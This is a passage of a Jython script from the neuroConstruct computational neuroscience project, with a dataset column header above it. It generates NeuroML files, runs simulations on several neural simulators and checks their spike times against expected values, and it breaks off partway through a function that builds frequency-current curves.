code
stringlengths 2
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int32 2
1.05M
|
|---|---|---|---|---|---|
# -*- coding: utf-8 -*-
#
#
# File to preform some standard tasks on a neuroConstruct project
#
# Author: Padraig Gleeson
#
# This file has been developed as part of the neuroConstruct project
# This work has been funded by the Medical Research Council and the
# Wellcome Trust
#
#
import sys
import time
import subprocess
from java.io import File
from ucl.physiol.neuroconstruct.cell.utils import CellTopologyHelper
from ucl.physiol.neuroconstruct.cell.compartmentalisation import GenesisCompartmentalisation
from ucl.physiol.neuroconstruct.cell.compartmentalisation import OriginalCompartmentalisation
from ucl.physiol.neuroconstruct.gui.plotter import PlotManager
from ucl.physiol.neuroconstruct.gui.plotter import PlotCanvas
from ucl.physiol.neuroconstruct.dataset import DataSet
from ucl.physiol.neuroconstruct.neuron import NeuronFileManager
from ucl.physiol.neuroconstruct.neuron.NeuronSettings import DataSaveFormat
from ucl.physiol.neuroconstruct.nmodleditor.processes import ProcessManager
from ucl.physiol.neuroconstruct.neuroml import NeuroMLConstants
from ucl.physiol.neuroconstruct.neuroml import LemsConstants
from ucl.physiol.neuroconstruct.project import SimPlot
from ucl.physiol.neuroconstruct.project import ProjectManager
from ucl.physiol.neuroconstruct.simulation import SimulationData
from ucl.physiol.neuroconstruct.simulation import SpikeAnalyser
from ucl.physiol.neuroconstruct.utils.units import UnitConverter
from ucl.physiol.neuroconstruct.utils import NumberGenerator
from ucl.physiol.neuroconstruct.hpc.mpi import MpiSettings
from ucl.physiol.neuroconstruct.pynn.PynnFileManager import PynnSimulator
from ucl.physiol.neuroconstruct.neuroml import NeuroMLFileManager
def loadMepFile(mepFile, scale=1):
# Load an OMV mep file, see https://github.com/OpenSourceBrain/osb-model-validation
spike_times = {}
mep_file = open(mepFile)
exp_name = ""
for line in mep_file:
line = line.strip()
if line.startswith('system:'):
pass
elif line.startswith('expected:'):
pass
elif line.startswith('spike times: ['):
times = line[14:-1].split(',')
tt = []
for time in times:
tt.append(float(time.strip())*scale)
spike_times[exp_name] = tt
else:
exp_name = line[:-1]
return spike_times
def generateNeuroML2(projFile,
simConfigs,
neuroConstructSeed = 1234,
seed = 1234,
verbose = True):
projectManager = ProjectManager()
project = projectManager.loadProject(projFile)
nmlfm = NeuroMLFileManager(project)
genDir = File(projFile.getParentFile(), "generatedNeuroML2")
if verbose: print("Generating NeuroML 2 files for project %s, sim configs: %s, into %s"%(project.getProjectName(), str(simConfigs), genDir.getAbsolutePath()))
for simConfigName in simConfigs:
projectManager.doGenerate(simConfigName, neuroConstructSeed)
while projectManager.isGenerating():
if verbose: print("Waiting for the project to be generated with Simulation Configuration: "+simConfigName)
time.sleep(5)
simConfig = project.simConfigInfo.getSimConfig(simConfigName)
nmlfm.generateNeuroMLFiles(simConfig,
NeuroMLConstants.NeuroMLVersion.getLatestVersion(),
LemsConstants.LemsOption.LEMS_WITHOUT_EXECUTE_MODEL,
OriginalCompartmentalisation(),
seed,
False,
True,
genDir,
"GENESIS Physiological Units",
False)
info = "These files are not the source files for the model, they have been generated from the source of the model in the neuroConstruct directory.\n"+ \
"These have been added to provide examples of valid NeuroML files for testing applications & the OSB website and may be removed at any time."
readme = open(genDir.getAbsolutePath()+'/README--GENERATED-FILES', 'w')
readme.write(info)
readme.close()
def generateNeuroML1(projFile,
simConfigs,
neuroConstructSeed = 1234,
seed = 1234,
verbose = True):
projectManager = ProjectManager()
project = projectManager.loadProject(projFile)
nmlfm = NeuroMLFileManager(project)
genDir = File(projFile.getParentFile(), "generatedNeuroML")
if verbose: print("Generating NeuroML v1.x files for project %s, sim configs: %s, into %s"%(project.getProjectName(), str(simConfigs), genDir.getAbsolutePath()))
for simConfigName in simConfigs:
projectManager.doGenerate(simConfigName, neuroConstructSeed)
while projectManager.isGenerating():
if verbose: print("Waiting for the project to be generated with Simulation Configuration: "+simConfigName)
time.sleep(5)
simConfig = project.simConfigInfo.getSimConfig(simConfigName)
nmlfm.generateNeuroMLFiles(simConfig,
NeuroMLConstants.NeuroMLVersion.NEUROML_VERSION_1,
LemsConstants.LemsOption.LEMS_WITHOUT_EXECUTE_MODEL,
OriginalCompartmentalisation(),
seed,
False,
True,
genDir,
"GENESIS Physiological Units",
False)
info = "These files are not the source files for the model, they have been generated from the source of the model in the neuroConstruct directory.\n"+ \
"These have been added to provide examples of valid NeuroML files for testing applications & the OSB website and may be removed at any time."
readme = open(genDir.getAbsolutePath()+'/README--GENERATED-FILES', 'w')
readme.write(info)
readme.close()
def getUnusedSimRef(project, simRefPrefix="P_Sim_"):
index = 0
while File( "%s/simulations/%s%i"%(project.getProjectMainDirectory().getCanonicalPath(), simRefPrefix,index)).exists():
index = index+1
simRef = "%s%i"%(simRefPrefix,index)
return simRef
def generateAndRunGenesis(project,
projectManager,
simConfig,
simRef,
simulatorSeed,
verbose=True,
quitAfterRun=False,
runInBackground=False,
units=-1,
symmetricComps=None):
prefix = "--- GENESIS gen: "
if verbose: print prefix+"Going to generate GENESIS files for: "+simRef
if runInBackground:
project.genesisSettings.setNoConsole()
if units == UnitConverter.GENESIS_SI_UNITS or units == UnitConverter.GENESIS_PHYSIOLOGICAL_UNITS:
project.genesisSettings.setUnitSystemToUse(units) # else leave it as the units set in the proj
project.genesisSettings.setMooseCompatMode(False)
if symmetricComps is not None:
project.genesisSettings.setSymmetricCompartments(symmetricComps)
project.genesisFileManager.setQuitAfterRun(quitAfterRun)
compartmentalisation = GenesisCompartmentalisation()
project.genesisFileManager.generateTheGenesisFiles(simConfig,
None,
compartmentalisation,
simulatorSeed)
success = projectManager.doRunGenesis(simConfig)
if success:
print prefix+"Set running GENESIS simulation: "+simRef
else:
print prefix+"Problem running GENESIS simulation: "+simRef
return success
def generateAndRunMoose(project,
projectManager,
simConfig,
simRef,
simulatorSeed,
verbose=True,
quitAfterRun=False,
runInBackground=False,
units=-1):
prefix = "--- MOOSE gen: "
if verbose: print prefix+"Going to generate MOOSE files for: "+simRef
if runInBackground:
project.genesisSettings.setNoConsole()
project.genesisFileManager.setQuitAfterRun(quitAfterRun)
if units == UnitConverter.GENESIS_SI_UNITS or units == UnitConverter.GENESIS_PHYSIOLOGICAL_UNITS:
project.genesisSettings.setUnitSystemToUse(units) # else leave it as the units set in the proj
project.genesisSettings.setMooseCompatMode(True)
compartmentalisation = GenesisCompartmentalisation()
project.genesisFileManager.generateTheGenesisFiles(simConfig,
None,
compartmentalisation,
simulatorSeed)
success = projectManager.doRunGenesis(simConfig)
if success:
print prefix+"Set running MOOSE simulation: "+simRef
else:
print prefix+"Problem running MOOSE simulation: "+simRef
return success
def generateAndRunPsics(project,
projectManager,
simConfig,
simRef,
simulatorSeed,
verbose=True,
runInBackground=False):
prefix = "--- PSICS gen: "
if verbose: print prefix+"Going to generate PSICS files for: "+simRef
project.psicsFileManager.generateThePsicsFiles(simConfig,
simulatorSeed)
success = projectManager.doRunPsics(simConfig, (not runInBackground))
if success:
print prefix+"Set running PSICS simulation: "+simRef
else:
print prefix+"Problem running PSICS simulation: "+simRef
return success
def generateAndRunLems(project,
projectManager,
simConfig,
simRef,
simulatorSeed,
verbose=True,
runInBackground=False,
version=NeuroMLConstants.NeuroMLVersion.getLatestVersion()):
prefix = "--- LEMS/NeuroML 2 gen: "
if verbose: print prefix+"Going to generate LEMS/NeuroML 2 files for: "+simRef
compartmentalisation = OriginalCompartmentalisation()
project.neuromlFileManager.generateNeuroMLFiles(simConfig,
version,
LemsConstants.LemsOption.EXECUTE_MODEL,
compartmentalisation,
simulatorSeed,
False,
False,
runInBackground)
return 1 # Call above will throw error if it fails
def generateAndRunPyNN(pynnSim,
project,
projectManager,
simConfig,
simRef,
simulatorSeed,
verbose=True,
runInBackground=False):
prefix = "--- PyNN_"+pynnSim+" gen: "
if verbose: print prefix+"Going to generate PyNN_"+pynnSim+" files for: "+simRef
pynnSimulator = None
if "NEST" in pynnSim:
pynnSimulator = PynnSimulator.NEST
elif "NEURON" in pynnSim:
pynnSimulator = PynnSimulator.NEURON
elif "BRIAN" in pynnSim:
pynnSimulator = PynnSimulator.BRIAN
else:
print pynnSim
#if verbose: print prefix+"Going to generate PyNN_"+str(pynnSimulator)+" files for: "+simRef
project.pynnFileManager.generateThePynnFiles(simConfig,
pynnSimulator,
simulatorSeed)
project.pynnFileManager.runFile(True)
return 1
def generateNeuron(project,
projectManager,
simConfig,
simRef,
simulatorSeed,
verbose= True,
quitAfterRun= False,
runInBackground= False,
varTimestep= False,
varTimestepTolerance= None,
saveAsHdf5 = False,
runMode = NeuronFileManager.RUN_HOC):
prefix = "--- NEURON gen: "
if verbose: print prefix+"Going to generate NEURON files for simulation: "+simRef
project.neuronFileManager.setQuitAfterRun(quitAfterRun)
if runInBackground:
project.neuronSettings.setNoConsole()
if saveAsHdf5:
project.neuronSettings.setDataSaveFormat(DataSaveFormat.HDF5_NC)
else:
project.neuronSettings.setDataSaveFormat(DataSaveFormat.TEXT_NC)
project.neuronSettings.setVarTimeStep(varTimestep)
if varTimestepTolerance is not None:
project.neuronSettings.setVarTimeAbsTolerance(varTimestepTolerance)
project.neuronFileManager.generateTheNeuronFiles(simConfig,
None,
runMode,
simulatorSeed)
if verbose: print prefix+"Generated hoc files for simulation: "+simRef
compileProcManager = ProcessManager(project.neuronFileManager.getMainHocFile())
compileSuccess = compileProcManager.compileFileWithNeuron(0,0)
if verbose: print prefix+"Compiled NEURON files for: "+simRef
return compileSuccess
def generateAndRunNeuron(project,
projectManager,
simConfig,
simRef,
simulatorSeed,
verbose= True,
quitAfterRun= False,
runInBackground= False,
varTimestep= False,
varTimestepTolerance= None,
saveAsHdf5 = False,
runMode = NeuronFileManager.RUN_HOC):
### Set simulation running
prefix = "--- NEURON gen: "
compileSuccess = generateNeuron(project, projectManager, simConfig, simRef,
simulatorSeed, verbose=verbose,
quitAfterRun=quitAfterRun,
runInBackground=runInBackground,
varTimestep=varTimestep,
varTimestepTolerance=varTimestepTolerance,
saveAsHdf5=saveAsHdf5,runMode=runMode)
if compileSuccess:
success = projectManager.doRunNeuron(simConfig)
if success:
print prefix+"Set running NEURON simulation: "+simRef
else:
print prefix+"Problem running NEURON simulation: "+simRef
return success
else:
return False
class SimulationManager():
knownSimulators = ["NEURON", "GENESIS", "GENESIS_SI", "GENESIS_PHYS", "MOOSE", "MOOSE_PHYS", "MOOSE_SI", "PSICS", "LEMS", "LEMSalpha", "PYNN_NEST", "PYNN_NEURON", "PYNN_BRIAN"]
plotFrames = {}
dataSets = {}
def __init__(self,
projFile,
numConcurrentSims = 1,
verbose = True):
self.allRunningSims = []
self.allRecentlyFinishedSims = []
self.allFinishedSims = []
self.projectManager = ProjectManager()
self.project = self.projectManager.loadProject(projFile)
self.numConcurrentSims = numConcurrentSims
self.verbose = verbose
self.printver("Starting Simulation Manager for project: "+self.project.getProjectFullFileName(), True)
self.printver("This will run up to %i simulations concurrently"%numConcurrentSims)
def printver(self, message, forcePrint=False):
if self.verbose or forcePrint:
print "--- SimMgr: "+ str(message)
def updateSimsRunning(self):
self.updateSimsRunningR(True)
def updateSimsRunningR(self, checkRemote):
remoteChecked = False
for sim in self.allRunningSims:
completed = False
timeFile = File(self.project.getProjectMainDirectory(), "simulations/"+sim+"/time.dat")
timeFile2 = File(self.project.getProjectMainDirectory(), "simulations/"+sim+"/time.txt") # for PSICS...
self.printver("Checking file: "+timeFile.getCanonicalPath() +", exists: "+ str(timeFile.exists()))
if (timeFile.exists()):
self.allFinishedSims.append(sim)
self.allRecentlyFinishedSims.append(sim)
self.allRunningSims.remove(sim)
completed = True
else:
self.printver("Checking file: "+timeFile2.getCanonicalPath() +", exists: "+ str(timeFile2.exists()))
if (timeFile2.exists()):
self.allFinishedSims.append(sim)
self.allRecentlyFinishedSims.append(sim)
self.allRunningSims.remove(sim)
completed = True
if checkRemote and not completed:
pullFile = File(self.project.getProjectMainDirectory(), "simulations/"+sim+"/pullsim.sh")
checkingRemoteFile = File(self.project.getProjectMainDirectory(), "simulations/"+sim+"/checkingRemote")
if pullFile.exists() and not checkingRemoteFile.exists():
pullCmd = ''+pullFile.getAbsolutePath()
self.printver("Going to run: "+pullCmd)
subprocess.call(pullCmd,shell=True)
remoteChecked = True
if remoteChecked:
self.printver("Waiting while remote simulations are checked...")
time.sleep(5)
self.updateSimsRunningR(False)
else:
self.printver("allRecentlyFinishedSims: "+str(self.allRecentlyFinishedSims))
self.printver("allFinishedSims: "+str(self.allFinishedSims))
self.printver("allRunningSims: "+str(self.allRunningSims))
def doCheckNumberSims(self):
self.printver("%i simulations out of max %s currently running: %s"%(len(self.allRunningSims), self.numConcurrentSims, str(self.allRunningSims)))
while (len(self.allRunningSims)>=self.numConcurrentSims):
self.printver("Waiting for another simulation slot to become available...")
time.sleep(4) # wait a while...
self.updateSimsRunning()
def reloadSims(self,
waitForAllSimsToFinish = True,
plotSims = True,
analyseSims = True,
plotVoltageOnly = False):
self.printver("Trying to reload simulations: "+str(self.allFinishedSims))
plottedSims = []
for simRef in self.allRecentlyFinishedSims:
simDir = File(self.project.getProjectMainDirectory(), "/simulations/"+simRef)
timeFile = File(simDir, "time.dat")
timeFile2 = File(simDir,"time.txt") # for PSICS...
if timeFile.exists() or timeFile2.exists():
self.printver("--- Reloading data from simulation in directory: %s"%simDir.getCanonicalPath())
time.sleep(1) # wait a while...
try:
simData = SimulationData(simDir)
simData.initialise()
times = simData.getAllTimes()
if plotSims:
simConfigName = simData.getSimulationProperties().getProperty("Sim Config")
if simConfigName.find('(')>=0:
simConfigName = simConfigName[0:simConfigName.find('(')]
for dataStore in simData.getAllLoadedDataStores():
ds = simData.getDataSet(dataStore.getCellSegRef(), dataStore.getVariable(), False)
#self.printver("Found data store: "+str(dataStore)+", plotting volts only: "+str(plotVoltageOnly))
if not plotVoltageOnly or dataStore.getVariable() == SimPlot.VOLTAGE:
plotFrame = PlotManager.getPlotterFrame("Behaviour of "+dataStore.getVariable() \
+" for sim config: %s"%(simConfigName))
plotFrame.addDataSet(ds)
if analyseSims:
volts = ds.getYValues()
analyseStartTime = 0
analyseStopTime = times[-1]
analyseThreshold = 0 # mV
spikeTimes = SpikeAnalyser.getSpikeTimes(volts, times, analyseThreshold, analyseStartTime, analyseStopTime)
self.printver("Spike times in %s for sim %s: %s"%(dataStore.getCellSegRef(), simRef, str(spikeTimes)), True)
plottedSims.append(simRef)
except:
self.printver("Error analysing simulation data from: %s"%simDir.getCanonicalPath(), True)
self.printver(sys.exc_info(), True)
for simRef in plottedSims:
self.allRecentlyFinishedSims.remove(simRef)
if waitForAllSimsToFinish and len(self.allRunningSims)>0:
self.printver("Waiting for sims: %s to finish..."%str(self.allRunningSims))
time.sleep(2) # wait a while...
self.updateSimsRunning()
self.reloadSims(waitForAllSimsToFinish,
plotSims,
analyseSims,
plotVoltageOnly)
def checkSims(self,
spikeTimesToCheck = {},
spikeTimeAccuracy = 0.01,
threshold = 0 ): # mV
self.updateSimsRunning()
self.printver( "Trying to check simulations: %s against: %s, with a threshold: %s" % (str(self.allFinishedSims), str(spikeTimesToCheck), str(threshold)))
report = ""
numPassed = 0
numFailed = 0
checksUnused = spikeTimesToCheck.keys()
for simRef in self.allFinishedSims:
simDir = File(self.project.getProjectMainDirectory(), "/simulations/"+simRef)
try:
simData = SimulationData(simDir)
simData.initialise()
times = simData.getAllTimes()
simConfigName = simData.getSimulationProperties().getProperty("Sim Config")
if simConfigName.find('(')>=0:
simConfigName = simConfigName[0:simConfigName.find('(')]
for dataStore in simData.getAllLoadedDataStores():
self.printver("Checking dataStore: "+str(dataStore)+" ("+dataStore.getCellSegRef()+")")
ds = simData.getDataSet(dataStore.getCellSegRef(), dataStore.getVariable(), False)
if dataStore.getVariable() == SimPlot.VOLTAGE:
if spikeTimesToCheck is not None:
volts = ds.getYValues()
analyseStartTime = 0
analyseStopTime = times[-1]
threshToUse = threshold
if type(threshold) is dict:
threshToUse = float(threshold[dataStore.getCellSegRef()])
spikeTimes = SpikeAnalyser.getSpikeTimes(volts, times, threshToUse, analyseStartTime, analyseStopTime)
self.printver("Spike times (crossing %f) from %f to %f in %s for sim %s: %s"%(threshToUse, analyseStartTime, analyseStopTime, dataStore.getCellSegRef(), simRef, str(spikeTimes)))
if spikeTimesToCheck.has_key(dataStore.getCellSegRef()):
self.printver("Removing %s from %s"%(str(dataStore.getCellSegRef()), str(checksUnused)))
if dataStore.getCellSegRef() in checksUnused:
checksUnused.remove(dataStore.getCellSegRef())
fail = False
spikeTimesTarget = spikeTimesToCheck[dataStore.getCellSegRef()]
if len(spikeTimes) != len(spikeTimesTarget):
report = report + "ERROR: Number of spikes of %s (%i) not same as target list for %s (%i)!\n"% \
(dataStore.getCellSegRef(), len(spikeTimes), simRef, len(spikeTimesTarget))
fail = True
for spikeNum in range(0, min(len(spikeTimesTarget),len(spikeTimes))):
delta = spikeTimesTarget[spikeNum] - spikeTimes[spikeNum]
if float(abs(delta)) > float(spikeTimeAccuracy):
report = report + "ERROR: Spike time: %f not within %f of %f (delta = %f) for %s in %s!\n" % \
(spikeTimes[spikeNum], spikeTimeAccuracy, spikeTimesTarget[spikeNum], delta, dataStore.getCellSegRef(), simRef)
fail = True
if fail:
numFailed=numFailed+1
else:
numPassed=numPassed+1
except:
self.printver("Error analysing simulation data from: %s"%simDir.getCanonicalPath())
raise
self.printver(sys.exc_info())
numFailed=numFailed+1
ignored = "" if len(checksUnused) == 0 else ", %i test conditions ignored"%(len(checksUnused))
report = report+"\n %i tests passed, %i tests failed%s!\n"%(numPassed, numFailed, ignored)
return report
def runMultipleSims(self,
simConfigs = ["Default Simulation Configuration"],
maxElecLens = [-1],
simDt = None,
simDtOverride = None,
simDuration = None,
neuroConstructSeed = 12345,
simulatorSeed = 11111,
simulators = ["NEURON", "GENESIS_PHYS"],
runSims = True,
generateSims = True,
verboseSims = True,
runInBackground = False,
varTimestepNeuron = None,
varTimestepTolerance = None,
simRefGlobalSuffix = '',
simRefGlobalPrefix = '',
mpiConfig = MpiSettings.LOCAL_SERIAL,
mpiConfigs = [],
suggestedRemoteRunTime = -1,
saveAsHdf5 = False,
saveOnlySpikes = False,
saveAllContinuous = False,
runMode = NeuronFileManager.RUN_HOC):
for sim in simulators:
if sim not in self.knownSimulators:
print "Unknown simulator: "+sim+"!"
print "Known simulators: "+str(self.knownSimulators)
sys.exit(1)
allSimsSetRunning = []
for simConfigName in simConfigs:
simConfig = self.project.simConfigInfo.getSimConfig(simConfigName)
self.printver("Going to generate network for Simulation Configuration: "+str(simConfig))
if saveOnlySpikes:
for simPlotName in simConfig.getPlots():
simPlot = self.project.simPlotInfo.getSimPlot(simPlotName)
if simPlot.getValuePlotted() == SimPlot.VOLTAGE:
simPlot.setValuePlotted(SimPlot.SPIKE)
if saveAllContinuous:
for simPlotName in simConfig.getPlots():
simPlot = self.project.simPlotInfo.getSimPlot(simPlotName)
#print simPlot
if SimPlot.SPIKE in simPlot.getValuePlotted():
simPlot.setValuePlotted(SimPlot.VOLTAGE)
#print simPlot
if len(mpiConfigs) == 0:
mpiConfigs = [mpiConfig]
for mpiConfigToUse in mpiConfigs:
mpiSettings = MpiSettings()
simConfig.setMpiConf(mpiSettings.getMpiConfiguration(mpiConfigToUse))
self.printver("Using Parallel Configuration: "+ str(simConfig.getMpiConf()))
if suggestedRemoteRunTime > 0:
self.project.neuronFileManager.setSuggestedRemoteRunTime(suggestedRemoteRunTime)
self.project.genesisFileManager.setSuggestedRemoteRunTime(suggestedRemoteRunTime)
for maxElecLen in maxElecLens:
if simDt is not None:
self.project.simulationParameters.setDt(simDt)
else:
simDt = self.project.simulationParameters.getDt() # for later if simDtOverride used...
if simDuration is not None:
simConfig.setSimDuration(simDuration)
recompSuffix = ""
if maxElecLen > 0:
cellGroup = simConfig.getCellGroups().get(0)
cell = self.project.cellManager.getCell(self.project.cellGroupsInfo.getCellType(cellGroup))
self.printver("Recompartmentalising cell in: "+cellGroup+" which is: "+str(cell))
info = CellTopologyHelper.recompartmentaliseCell(cell, maxElecLen, self.project)
self.printver("*** Recompartmentalised cell: "+info)
if len(maxElecLens) > 1 or maxElecLen > 0 : recompSuffix = "_"+str(maxElecLen)
self.projectManager.doGenerate(simConfig.getName(), neuroConstructSeed)
while self.projectManager.isGenerating():
self.printver("Waiting for the project to be generated with Simulation Configuration: "+str(simConfig))
time.sleep(15)
self.printver("Generated network with %i cell(s)" % self.project.generatedCellPositions.getNumberInAllCellGroups())
simRefPrefix = (simConfigName+"_").replace(' ', '').replace(':', '')
if len(mpiConfigs) > 1:
simRefPrefix = simRefPrefix+(mpiConfigToUse+"_").replace(' ', '').replace('(', '_').replace(')', '_')
self.doCheckNumberSims()
self.printver("Going to generate for simulators: "+str(simulators))
if simulators.count("NEURON")>0:
if simDtOverride is not None:
if simDtOverride.has_key("NEURON"):
self.project.simulationParameters.setDt(simDtOverride["NEURON"])
else:
self.project.simulationParameters.setDt(simDt)
simRef = simRefGlobalPrefix + simRefPrefix+"_N"+recompSuffix + simRefGlobalSuffix
self.project.simulationParameters.setReference(simRef)
if varTimestepNeuron is None:
varTimestepNeuron = self.project.neuronSettings.isVarTimeStep()
if varTimestepTolerance is None:
varTimestepTolerance = self.project.neuronSettings.getVarTimeAbsTolerance()
if generateSims or runSims:
func = generateAndRunNeuron if runSims else generateNeuron
print("Using function %s" % str(func))
success = func(self.project,
self.projectManager,
simConfig,
simRef,
simulatorSeed,
verbose= verboseSims,
runInBackground= runInBackground,
varTimestep= varTimestepNeuron,
varTimestepTolerance= varTimestepTolerance,
saveAsHdf5 = saveAsHdf5,
runMode = runMode)
if success and runSims:
self.allRunningSims.append(simRef)
allSimsSetRunning.append(simRef)
else:
allSimsSetRunning.append(simRef)
self.doCheckNumberSims()
if simulators.count("PSICS")>0:
if simDtOverride is not None:
if simDtOverride.has_key("PSICS"):
self.project.simulationParameters.setDt(simDtOverride["PSICS"])
else:
self.project.simulationParameters.setDt(simDt)
simRef = simRefGlobalPrefix + simRefPrefix+"_P"+recompSuffix + simRefGlobalSuffix
self.project.simulationParameters.setReference(simRef)
if runSims:
success = generateAndRunPsics(self.project,
self.projectManager,
simConfig,
simRef,
simulatorSeed,
verbose=verboseSims,
runInBackground=runInBackground)
if success:
self.allRunningSims.append(simRef)
allSimsSetRunning.append(simRef)
else:
allSimsSetRunning.append(simRef)
self.doCheckNumberSims()
if simulators.count("LEMSalpha")>0:
if simDtOverride is not None:
if simDtOverride.has_key("LEMS"):
self.project.simulationParameters.setDt(simDtOverride["LEMS"])
else:
self.project.simulationParameters.setDt(simDt)
simRef = simRefGlobalPrefix + simRefPrefix+"_L"+recompSuffix + simRefGlobalSuffix
self.project.simulationParameters.setReference(simRef)
if runSims:
success = generateAndRunLems(self.project,
self.projectManager,
simConfig,
simRef,
simulatorSeed,
verbose=verboseSims,
runInBackground=runInBackground,
version=NeuroMLConstants.NeuroMLVersion.NEUROML_VERSION_2_ALPHA)
if success:
self.allRunningSims.append(simRef)
allSimsSetRunning.append(simRef)
else:
allSimsSetRunning.append(simRef)
if simulators.count("LEMS")>0:
if simDtOverride is not None:
if simDtOverride.has_key("LEMS"):
self.project.simulationParameters.setDt(simDtOverride["LEMS"])
else:
self.project.simulationParameters.setDt(simDt)
simRef = simRefGlobalPrefix + simRefPrefix+"_L"+recompSuffix + simRefGlobalSuffix
self.project.simulationParameters.setReference(simRef)
if runSims:
success = generateAndRunLems(self.project,
self.projectManager,
simConfig,
simRef,
simulatorSeed,
verbose=verboseSims,
runInBackground=runInBackground,
version=NeuroMLConstants.NeuroMLVersion.getLatestVersion())
if success:
self.allRunningSims.append(simRef)
allSimsSetRunning.append(simRef)
else:
allSimsSetRunning.append(simRef)
self.doCheckNumberSims()
for sim in simulators:
if "PYNN_" in sim:
if simDtOverride is not None:
if simDtOverride.has_key(sim):
self.project.simulationParameters.setDt(simDtOverride[sim])
else:
self.project.simulationParameters.setDt(simDt)
pynnSim = sim[5:]
simRef = simRefGlobalPrefix + simRefPrefix+"_Py_"+pynnSim+recompSuffix + simRefGlobalSuffix
self.project.simulationParameters.setReference(simRef)
if runSims:
success = generateAndRunPyNN(pynnSim,
self.project,
self.projectManager,
simConfig,
simRef,
simulatorSeed,
verbose=verboseSims,
runInBackground=runInBackground)
if success:
self.allRunningSims.append(simRef)
allSimsSetRunning.append(simRef)
else:
allSimsSetRunning.append(simRef)
self.printver("Waiting a while before running next sim...")
time.sleep(2) # wait a while before running PyNN...
self.doCheckNumberSims()
for sim in simulators:
if "MOOSE" in sim:
if simDtOverride is not None:
if simDtOverride.has_key(sim):
self.project.simulationParameters.setDt(simDtOverride[sim])
else:
self.project.simulationParameters.setDt(simDt)
simRef = simRefGlobalPrefix + simRefPrefix+"_M"+recompSuffix + simRefGlobalSuffix
units = -1 # leave as what's set in project
if "_SI" in sim:
simRef = simRef+"_SI"
units = UnitConverter.GENESIS_SI_UNITS
if "_PHYS" in sim:
simRef = simRef+"_PHYS"
units = UnitConverter.GENESIS_PHYSIOLOGICAL_UNITS
self.project.simulationParameters.setReference(simRef)
if runSims:
success = generateAndRunMoose(self.project,
self.projectManager,
simConfig,
simRef,
simulatorSeed,
verbose=verboseSims,
quitAfterRun=runInBackground,
runInBackground=runInBackground,
units=units)
if success:
self.allRunningSims.append(simRef)
allSimsSetRunning.append(simRef)
else:
allSimsSetRunning.append(simRef)
time.sleep(1) # wait a while before running GENESIS...
self.doCheckNumberSims()
for sim in simulators:
if "GENESIS" in sim:
if simDtOverride is not None:
if simDtOverride.has_key(sim):
self.project.simulationParameters.setDt(simDtOverride[sim])
else:
self.project.simulationParameters.setDt(simDt)
simRef = simRefGlobalPrefix + simRefPrefix+"_G"+recompSuffix + simRefGlobalSuffix
units = -1 # leave as what's set in project
if "_SI" in sim:
simRef = simRef+"_SI"
units = UnitConverter.GENESIS_SI_UNITS
if "_PHYS" in sim:
simRef = simRef+"_PHYS"
units = UnitConverter.GENESIS_PHYSIOLOGICAL_UNITS
self.project.simulationParameters.setReference(simRef)
if runSims:
success = generateAndRunGenesis(self.project,
self.projectManager,
simConfig,
simRef,
simulatorSeed,
verbose=verboseSims,
quitAfterRun=runInBackground,
runInBackground=runInBackground,
units=units,
symmetricComps=None)
if success:
self.allRunningSims.append(simRef)
allSimsSetRunning.append(simRef)
else:
allSimsSetRunning.append(simRef)
time.sleep(1) # wait a while before running GENESISsym...
self.doCheckNumberSims()
if simulators.count("GENESISsym")>0:
simRef = simRefGlobalPrefix + simRefPrefix+"_Gs"+recompSuffix + simRefGlobalSuffix
self.project.simulationParameters.setReference(simRef)
if runSims:
success = generateAndRunGenesis(self.project,
self.projectManagerm,
simConfig,
simRef,
simulatorSeed,
verbose=verboseSims,
quitAfterRun=runInBackground,
runInBackground=runInBackground,
symmetricComps=True)
if success:
self.allRunningSims.append(simRef)
allSimsSetRunning.append(simRef)
else:
allSimsSetRunning.append(simRef)
self.updateSimsRunningR(False)
self.printver("Finished setting running all simulations for ParallelConfig: "+mpiConfigToUse)
self.printver("Finished setting running all simulations for sim config: "+simConfigName)
return allSimsSetRunning
def generateFICurve(self,
simulator,
simConfigName,
stimAmpLow,
stimAmpInc,
stimAmpHigh,
stimDel,
stimDur,
simDuration,
analyseStartTime,
analyseStopTime,
analyseThreshold,
simDt = None,
simPrefix = 'FI_',
neuroConstructSeed = 1234,
plotAllTraces = False,
verboseSims = True,
varTimestepNeuron = None,
mpiConfig = MpiSettings.LOCAL_SERIAL,
suggestedRemoteRunTime = -1):
simConfig = self.project.simConfigInfo.getSimConfig(simConfigName)
self.printver("Going to generate F-I curve on %s for sim config: %s with amplitude of stim: (%f -> %f ; %f)" % (simulator, simConfigName, stimAmpLow, stimAmpHigh, stimAmpInc))
if simConfig == None:
raise NameError('No such Simulation configuration as: '+ simConfigName+'. \nExisting sim configs: '+str(self.project.simConfigInfo.getAllSimConfigNames()))
simConfig.setSimDuration(simDuration)
self.projectManager.doGenerate(simConfig.getName(), neuroConstructSeed)
while self.projectManager.isGenerating():
self.printver("Waiting for the project to be generated with Simulation Configuration: "+str(simConfig))
time.sleep(1)
numGenerated = self.project.generatedCellPositions.getNumberInAllCellGroups()
self.printver("Number of cells generated: " + str(numGenerated))
if numGenerated > 0:
self.printver("Generating scripts for simulator: %s..."%simulator)
if simulator == 'NEURON':
self.project.neuronFileManager.setQuitAfterRun(1) # Remove this line to leave the NEURON sim windows open after finishing
self.project.neuronSettings.setCopySimFiles(1) # 1 copies hoc/mod files to PySim_0 etc. and will allow multiple sims to run at once
self.project.neuronSettings.setGraphicsMode(0) # 0 hides graphs during execution
if simulator.count('GENESIS')>0 or simulator.count('MOOSE')>0:
self.project.genesisFileManager.setQuitAfterRun(1) # Remove this line to leave the NEURON sim windows open after finishing
self.project.genesisSettings.setCopySimFiles(1) # 1 copies hoc/mod files to PySim_0 etc. and will allow multiple sims to run at once
self.project.genesisSettings.setGraphicsMode(0) # 0 hides graphs during execution
stimAmp = stimAmpLow
simRefsVsStims = {}
while (stimAmp - stimAmpHigh) < (stimAmpInc/1e9): # to avoid floating point errors
######## Adjusting the amplitude of the current clamp ###############
stim = self.project.elecInputInfo.getStim(simConfig.getInputs().get(0))
if stim.getElectricalInput().getType() != "IClamp":
raise Exception('Simulation config: '+ simConfigName+' has a non IClamp input: '+str(stim)+'!')
if simConfig.getInputs()>1:
for stimIndex in range(1, simConfig.getInputs().size()):
stimOther = self.project.elecInputInfo.getStim(simConfig.getInputs().get(stimIndex))
if stimOther.getElectricalInput().getType() != "IClamp":
raise Exception('Simulation config: '+ simConfigName+' has a non IClamp input: '+str(stimOther)+'!')
else:
stimOther.setAmp(NumberGenerator(0))
stimOther.setDel(NumberGenerator(0))
